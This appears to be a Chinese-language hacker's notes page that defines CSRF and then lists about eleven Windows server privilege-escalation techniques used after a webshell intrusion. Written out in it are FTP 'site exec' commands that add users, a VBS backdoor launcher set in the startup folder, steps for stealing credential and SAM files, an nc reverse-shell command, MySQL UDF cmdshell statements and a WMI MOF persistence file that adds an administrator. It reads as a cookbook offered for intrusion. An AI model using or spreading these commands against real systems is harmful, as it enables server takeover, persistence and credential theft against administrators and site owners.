Hacker_筆記_業內術語

標籤：

參考連結：

http://bbs.51cto.com/thread-623419-1.html

CSRF:

跨站請求偽造

依靠使用者標識危害網站利用網站對使用者標識的信任欺騙使用者的瀏覽器發送HTTP請求給目標網站另外可以通過IMG標籤會觸發一個GET請求，可以利用它來實現CSRF攻擊。  提權：提高自己在伺服器中的許可權，主要針對網站入侵過程中，當入侵某一網站時，通過各種漏洞提升WEBSHELL許可權以奪得該伺服器許可權。 提權的主要方法有以下幾種： 第一 如果伺服器上有裝了pcanywhere服務端，管理員為了管理方便也給了我們方便，到系統硬碟的Documents and Settings/All Users/Application Data/Symantec/pcAnywhere/中下載*.cif本地破解就使用pcanywhere串連就可以了。 第二 一般伺服器的管理都是本機設計完畢然後上傳到空間裡，那麼就會用到ftp，伺服器使用最多的就是servu那麼我們就利用servu來提升許可權通過servu提升許可權需要servu安裝目錄可寫～好開始把，首先通過webshell訪問servu安裝資料夾下的ServUDaemon.ini把他下載下來，然後在本機上安裝一個servu把ServUDaemon.ini放到本地安裝資料夾下覆蓋，啟動servu添加了一個使用者，設定為系統管理員，目錄C:\，具有可執行許可權然後去servu安裝目錄裡把ServUDaemon.ini更換伺服器上的。用我建立的使用者和密碼串連ftpftp>open ipConnected to ip.220 Serv-U FTP Server v5.0.0.4 for WinSock ready...User (ip:(none)): id //剛才添加的使用者331 User name okay, please send complete E-mail address as password.Password:password //密碼230 User logged in, proceed.ftp> cd winnt //進入win2k的winnt目錄250 Directory changed to /WINNTftp>cd system32 //進入system32目錄250 Directory changed to /WINNT/system32ftp>quote site exec net.exe user rover rover1234 /add //利用系統的net.exe檔案加使用者。如果提示沒有許可權，那我們就把後門（server.exe） 傳他system32目錄然後寫一個VBs指令碼setwshshell=createobject ("wscript.shell")a=wshshell.run ("cmd.exe /c net user user pass /add",0)b=wshshell.run ("cmd.exe /c net localgroup Administrators user /add",0)b=wshshell.run ("cmd.exe /c server.exe",0)存為xx.vbe這個指令碼的作用是建立user使用者密碼為pass並且提升為管理員然後執行system32目錄下的server.exe把這個教本傳他 C:\Documents and Settings\All Users\「開始」菜單\程式\啟動目錄這樣管理員只要一登陸就會執行那個教本.接下來就是等了.等他登陸. 第三 就是先檢查有什麼系統服務，或者隨系統啟動自動啟動的程式和管理員經常使用的軟體， 比如諾頓，VAdministrator，金山，瑞星,WinRAR甚至QQ之類的，是否可以寫，如果可以就修改其程式， 綁定一個批處理或者VBS，然後還是等待伺服器重啟。 第四 尋找conn和config ,pass這類型的檔案看能否得到sa或者mysql的相關密碼，可能會有所收穫等等。 第五 使用Flashfxp也能提升許可權，但是成功率就看你自己的運氣了首先找到FlashFXP檔案夾，開啟(編輯)Sites. dat，這個檔案這是什麼東西密碼和使用者名稱，而且密碼是加了密的。 如果我把這些檔案copy回本地也就是我的電腦中，替換我本地的相應檔案。然後會發現 開啟flashfxp在網站中開啟網站管理器一樣。又可以添加N多肉雞啦～～嘻嘻～唔？？不對啊，是來提升許可權的啊，暈，接著來別半途而廢。大家看看對方管理員的這網站管理器，有使用者名稱和密碼，密碼是星號的。經過用xp星號密碼查看器查看，然後和Sites.dat中加密了密碼做比較發現並未加密而是查到的密碼是明文顯示， 然後最終把這個網站管理員的密碼從這堆東西中找出來。那麼下一步就可以連結這些新的伺服器啦～～經過測試只要把含有密碼和使用者名稱的Sites.dat檔案替換到本地相應的檔案就可以在本地還原對方管理員的各個網站的密碼。 第六 WIN2K+IIS5.0預設情況下應用程式保護選項是"中（共用的）"，這時IIS載入isapi是用的iwam_computername使用者身份執行。但預設情況下WIN2K+IIS5對於一些特殊isapi又要以system身份載入。win2k+iis5 、win2k+iis5+sp1、win2k+iis5+sp2都是簡單的判斷isapi的檔案名稱，並且沒有做目錄限制，以SYSTEM許可權載入的isapi有：1、idq.dll2、 httpext.dll3、 httpodbc.dll4、 ssinc.dll5、 msw3prt.dll6、 author.dll7、 admin.dll8、 shtml.dll9、 sspifilt.dll10、compfilt.dll11、pwsdata.dll12、md5filt.dll13、fpexedll.dll所以利用這很容易得到SYSTEM許可權。並且判斷檔案名稱的時候有個 bug，比如請求/scripts/test%81%5cssinc.dll也將會認為是請求的ssinc.dll,就是分離檔案路徑的時候沒有考慮到雙 位元組的 遠東版問題。ssinc.dll在處理包含檔案路徑的時候也有一個問題，就是"/"、"\"只識別了一個 "/"，所以如果請求裡面使用"\"，就會錯誤的處理包含檔案路徑，有可能泄露東西或者出現許可權 漏洞，這種漏洞很多別的地方（ php、asp等）也還存在。載入這些isapi不是單以檔案名稱做依據了，而是加了路徑，應該是修正了此問題。一般預設情況下是：1、idq.dlld:\winnt\system32\idq.dll2、 httpext.dll d:\winnt\system32\inetsrv\httpext.dll3、 httpodbc.dll d:\winnt\system32\inetsrv\httpodbc.dll4、 ssinc.dll d:\winnt\system32\inrtsrv\ssinc.dll5、 msw3prt.dll d:\winnt\system32\msw3prt.dll6、 author.dll D:\Program Files\Common Files\Microsoft Shared\web server extensions\40\isapi\_vti_aut\author.dll7、 admin.dll D:\Program Files\Common Files\Microsoft Shared\web server extensions\40\isapi\_vti_adm\admin.dll8、 shtml.dll D:\Program Files\Common Files\Microsoft Shared\web server extensions\40\isapi\shtml.dll9、 sspifilt.dll d:\winnt\system32\inetsrv\sspifilt.dll10、compfilt.dll d:\winnt\system32\inetsrv\compfilt.dll11、pwsdata.dll d:\winnt\system32\inetsrv\pwsdata.dll12、md5filt.dll d:\winnt\system32\inetsrv\md5filt.dll13、fpexedll.dll D:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bin\fpexedll.dll正常情況下這些路徑都guest不能寫,但如果配置不好，這些路徑iis user能夠寫了就一樣可以提升許可權了可以把ISAPIHack.dll上傳到IIS的可執行目錄，檔案名稱可叫ssinc.dll或者admin.dll等（上面列的13個檔案名稱之一）。然後等待IIS重啟載入此dll，就可以獲得許可權了 第七 下載系統的 %windir%\repair\sam.*（WinNT 4下是sam._ 而Windows 2000下是sam）檔案，然後用L0pht等軟體進行破解，只要能拿到，肯花時間，就一定可以破解。 第八 PipeUpAdmin（Windows 2000下）, 在本機運行可以把目前使用者帳號加入Administrator 群組。普通使用者和Guests組使用者都可以成功運行。 第九 Serv-u Ftp Server 本地許可權提升漏洞：很多主機的C:\Documents and Settings\All Users\ Documents目錄以及下邊幾個子目錄Documents沒有設定許可權，導致可以在這個目錄上傳並運行Exp. 直接上傳了serv-u local exploit 和nc, 並且把serv-u的本地提升許可權的名字命名為su.exe 檔就放在C:\Documents and Settings\All Users\ Documents, 然後我們用su.exe直接建立使用者,也可以反彈一個shell過來的。具體命令：建立使用者: serv-u.exe "cmd">USER xl>PASS 111111反彈shell: serv-u.exe "nc.exe -l -p 99 -e cmd.exe" 第十 udf提權。利用條件：root許可權的mysql帳號密碼。提權方法：具體語句如下：
　　create function cmdshell returns string soname ‘udf.dll‘;
　　select cmdshell(’net user iis_user 123 /add’);
　　select cmdshell(’net localgroup administrators iis_user /add’);
　　select cmdshell(’regedit /s d:\web\3389.reg’);
　　drop function cmdshell;
　　select cmdshell(’netstat -an’);第十一mof提權。#pragma namespace("\\\\.\\root\\subscription")instance of __EventFilter as $EventFilter
　　{
　　EventNamespace = "Root\\Cimv2";
　　Name = "filtP2";
　　Query = "Select * From __InstanceModificationEvent "
　　"Where TargetInstance Isa \"Win32_LocalTime\" "
　　"And TargetInstance.Second = 5";
　　QueryLanguage = "WQL";
　　};instance of ActiveScriptEventConsumer as $Consumer
　　{
　　Name = "consPCSV2";
　　ScriptingEngine = "JScript";
　　ScriptText =
　　"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add\")";
　　};instance of __FilterToConsumerBinding
　　{
　　Consumer = $Consumer;
　　Filter = $EventFilter;
　　};
　　關閉防火牆服務 net stop "Windows Firewall/Internet Connection Sharing (ICS)"
　　以上儲存為xxx.mof
　　1.找個可寫目錄，上傳mof檔案
　　2.執行sql
　　select load_file(‘C:\\RECYCLER\\nullevt.mof‘) into
　　dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof‘;  TapJacking  觸屏劫持http://blog.trendmicro.com/trendlabs-security-intelligence/tapjacking-an-untapped-threat-in-android/

Hacker_筆記_業內術語